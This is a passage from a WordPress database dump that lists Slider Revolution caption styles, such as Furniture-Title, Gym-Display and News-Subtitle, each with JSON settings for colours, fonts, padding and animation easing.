_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(54,'.tp-caption.Restaurant-Menuitem','{\"hover\":\"false\",\"type\":\"text\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#000000\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#ffffff\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"500\",\"easing\":\"Power2.easeInOut\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"17px\",\"line-height\":\"17px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"10px\",\"30px\",\"10px\",\"30px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(55,'.tp-caption.Furniture-LogoText','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}','{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}','{\"color\":\"#e6cfa3\",\"color-transparency\":\"1\",\"font-size\":\"160px\",\"line-height\":\"150px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"\\\"Raleway\\\"\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(56,'.tp-caption.Furniture-Plus','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"30px\",\"30px\",\"30px\",\"30px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0.5\",\"easing\":\"Linear.easeNone\"}','{\"idle\":{\"text-shadow\":\"none\",\"box-shadow\":\"rgba(0,0,0,0.1) 0 1px 3px\"},\"hover\":\"\"}','{\"color\":\"#e6cfa3\",\"color-transparency\":\"1\",\"font-size\":\"20\",\"line-height\":\"20px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"\\\"Raleway\\\"\",\"padding\":[\"6px\",\"7px\",\"4px\",\"7px\"],\"text-decoration\":\"none\",\"background-color\":\"#ffffff\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"30px\",\"30px\",\"30px\",\"30px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(57,'.tp-caption.Furniture-Title','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}','{\"idle\":{\"text-shadow\":\"none\",\"letter-spacing\":\"3px\"},\"hover\":\"\"}','{\"color\":\"#000000\",\"color-transparency\":\"1\",\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"700\",\"font-style\":\"normal\",\"font-family\":\"\\\"Raleway\\\"\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(58,'.tp-caption.Furniture-Subtitle','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}','{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}','{\"color\":\"#000000\",\"color-transparency\":\"1\",\"font-size\":\"17px\",\"line-height\":\"20px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"\\\"Raleway\\\"\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(59,'.tp-caption.Gym-Display','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"80px\",\"line-height\":\"70px\",\"font-weight\":\"900\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(60,'.tp-caption.Gym-Subline','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}','{\"idle\":{\"letter-spacing\":\"5px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"30px\",\"line-height\":\"30px\",\"font-weight\":\"100\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(61,'.tp-caption.Gym-SmallText','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}','{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"17px\",\"line-height\":\"22\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(62,'.tp-caption.Fashion-SmallText','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"12px\",\"line-height\":\"20px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(63,'.tp-caption.Fashion-BigDisplay','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}','{\"color\":\"#000000\",\"color-transparency\":\"1\",\"font-size\":\"60px\",\"line-height\":\"60px\",\"font-weight\":\"900\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(64,'.tp-caption.Fashion-TextBlock','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}','{\"color\":\"#000000\",\"color-transparency\":\"1\",\"font-size\":\"20px\",\"line-height\":\"40px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(65,'.tp-caption.Sports-Display','{\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}','{\"idle\":{\"letter-spacing\":\"13px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"130px\",\"line-height\":\"130px\",\"font-weight\":\"100\",\"font-style\":\"normal\",\"font-family\":\"\\\"Raleway\\\"\",\"padding\":\"0 0 0 0\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":\"0 0 0 0\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(66,'.tp-caption.Sports-DisplayFat','{\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}','{\"idle\":[\"\"],\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"130px\",\"line-height\":\"130px\",\"font-weight\":\"900\",\"font-style\":\"normal\",\"font-family\":\"\\\"Raleway\\\"\",\"padding\":\"0 0 0 0\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":\"0 0 0 0\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(67,'.tp-caption.Sports-Subline','{\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}','{\"idle\":{\"letter-spacing\":\"4px\"},\"hover\":\"\"}','{\"color\":\"#000000\",\"color-transparency\":\"1\",\"font-size\":\"32px\",\"line-height\":\"32px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"\\\"Raleway\\\"\",\"padding\":\"0 0 0 0\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":\"0 0 0 0\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(68,'.tp-caption.Instagram-Caption','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"900\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(69,'.tp-caption.News-Title','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"70px\",\"line-height\":\"60px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"Roboto Slab\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(70,'.tp-caption.News-Subtitle','{\"hover\":\"true\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"0.65\",\"text-decoration\":\"none\",\"background-color\":\"#ffffff\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"0px\",\"border-radius\":[\"0\",\"0\",\"0px\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"300\",\"easing\":\"Power3.easeInOut\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"15px\",\"line-height\":\"24px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"Roboto Slab\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"#ffffff\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(71,'.tp-caption.Photography-Display','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}','{\"idle\":{\"letter-spacing\":\"5px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"80px\",\"line-height\":\"70px\",\"font-weight\":\"100\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(72,'.tp-caption.Photography-Subline','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}','{\"idle\":{\"letter-spacing\":\"3px\"},\"hover\":\"\"}','{\"color\":\"#777777\",\"color-transparency\":\"1\",\"font-size\":\"20px\",\"line-height\":\"30px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_